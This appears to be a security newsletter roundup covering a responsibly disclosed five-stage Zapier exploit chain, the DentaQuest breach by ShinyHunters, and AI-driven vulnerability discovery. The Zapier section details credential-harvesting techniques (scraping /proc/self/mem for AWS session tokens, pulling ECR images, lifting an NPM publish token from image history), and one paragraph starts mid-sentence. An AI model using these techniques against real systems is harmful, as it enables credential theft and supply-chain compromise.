
Three security stories dropped within a week in late May / early June 2026, and they're worth reading together. Token Security disclosed a five-stage Zapier exploit chain that turned a free account into a JavaScript execution primitive on zapier.com. DentaQuest confirmed a breach of 2.6 million accounts after the ShinyHunters extortion group leaked 234 GB of data. And AI-driven vulnerability discovery crossed another threshold, with Claude Mythos Preview finding thousands of high-severity flaws in widely-deployed open-source code in a single month.
What You Need to Know: On May 28, 2026, Token Security researchers published a writeup of a five-stage Zapier exploit chain — combining a Lambda memory-scraping primitive, an over-permissioned ECR role, an orphaned NPM publish token, and a package that loads in every authenticated zapier.com session — that they reported on February 12 and that earned them a $3,000 bounty. Two days later, dental benefits administrator DentaQuest (owned by Sun Life) confirmed a ShinyHunters breach exposing 2.6 million accounts, including 2.6 million unique email addresses. In the same week, Anthropic's Claude Mythos Preview disclosed that it had found 10,000+ high-severity vulnerabilities in widely-deployed open-source software in a single month.
del os.environ[k] not zeroing heap bytes, the allow_nothing_role that wasn't actually nothing, the NPM token in history[], the zapier-design-system package loading in every authenticated session — is a known anti-pattern. The lesson is that bounty programs need to look at chains, not just primitives.The full technical writeup is on Help Net Security. The chain ran through five separate systems. Stage 1: inside Code by Zapier's Python sandbox, running on AWS Lambda in us-east-1, a call to os.system('env') returned the environment after Zapier's handler tried to scrub AWS credentials. The scrubber used del os.environ[k], which removes the Python dict reference and calls unsetenv() in libc — but doesn't zero the bytes on the process heap. The researchers read /proc/self/mem, ran four regex patterns against readable memory regions, and recovered live STS session tokens for the role assigned to the Lambda.
Stage 2: the recovered role was allow_nothing_role, which actually permitted ecr:DescribeRepositories, ecr:ListImages, ecr:BatchGetImage, and ecr:GetDownloadUrlForLayer. Those four perms are enough to pull container images through the AWS API without ever requesting a Docker registry auth token. The researchers enumerated 1,111 production repositories and pulled images using the layer-fetch APIs.
Stage 3: in one image, an NPM publish token had leaked into the container config history. The token had been passed to the build through a Dockerfile ARG, which serializes into the image's history[] field. NPM API metadata showed the token had action: write, name: null, and bypass_2fa: true. The combination granted publish rights to every package the associated account could publish — including zapier-platform-core, zapier-platform-cli, and zapier-design-system.
Stage 4: zapier-design-system loads in every authenticated session on zapier.com. The researchers verified the load path in browser developer tools and stopped there. A poisoned version of the package would have executed attacker-controlled JavaScript inside the authenticated origin on the next release.
Stage 5 (the consequence): an attacker with that access could act as the user inside Zapier, creating Zaps, Tables, and MCP servers, and driving the user's existing integrations through the platform. OAuth tokens for every connected service would have been accessible. Zapier triaged the report within four days of submission on February 12, 2026, revoked the leaked NPM token, and tightened the underlying AWS role by February 16. The bounty was $3,000 — the program maximum, with a "we'll review the cap at the next program review" commitment.
DentaQuest confirmed the breach on June 2, 2026, after ShinyHunters added it to their dark-web leak site. Per Have I Been Pwned's June 3, 2026 entry, the data was a "pay or leak" extortion campaign that included "names, contact information, dates of birth, and dental plan information." The Privacy Guides data breach roundup for May 29 – June 4, 2026 pegs the count at 2.6 million accounts. The Check Point Research threat intelligence report for June 8, 2026 adds that ShinyHunters claimed 234 GB of data. DentaQuest is owned by Sun Life U.S., and the breach is now in active class-action territory (per GS Legal's investigation).
Anthropic's Claude Mythos Preview, the unreleased frontier model, disclosed finding 10,000+ high-severity software flaws in widely-deployed open-source software in a single month (per Develeap's coverage and The Hacker News's May 2026 writeup). The 271 Firefox bugs in that count, including the "27-year-old vulnerability" the AI surfaced, are the kind of result that changes defender economics. An AI agent can now read a million lines of code, fuzz every input boundary, and write a CVE-formatted report — and it can do that in parallel. The same capability, in the wrong hands, is the new attack surface.
The Zapier chain is the one to study. Not because Zapier is uniquely broken — every complex SaaS has the same shape of composable primitives — but because the researchers actually stopped at every step, wrote it up, and got a real remediation. The DentaQuest breach is the more painful one: a name, a date of birth, and a dental plan are a lifetime of phishing fodder. And the AI-discovery story is the one that will define the next two years: defender-as-agent versus attacker-as-agent, and the side that builds the better tooling wins.
Token Security disclosed a five-stage Zapier exploit chain (Lambda memory scraping → over-permissioned ECR role → orphaned NPM token → auth-origin JavaScript) that paid $3,000. DentaQuest confirmed a 2.6M-account breach by ShinyHunters (234 GB leaked). Claude Mythos Preview disclosed 10,000+ AI-found high-severity open-source vulnerabilities in a month.
Source: TLDR | mr.technology — The Master Skill Index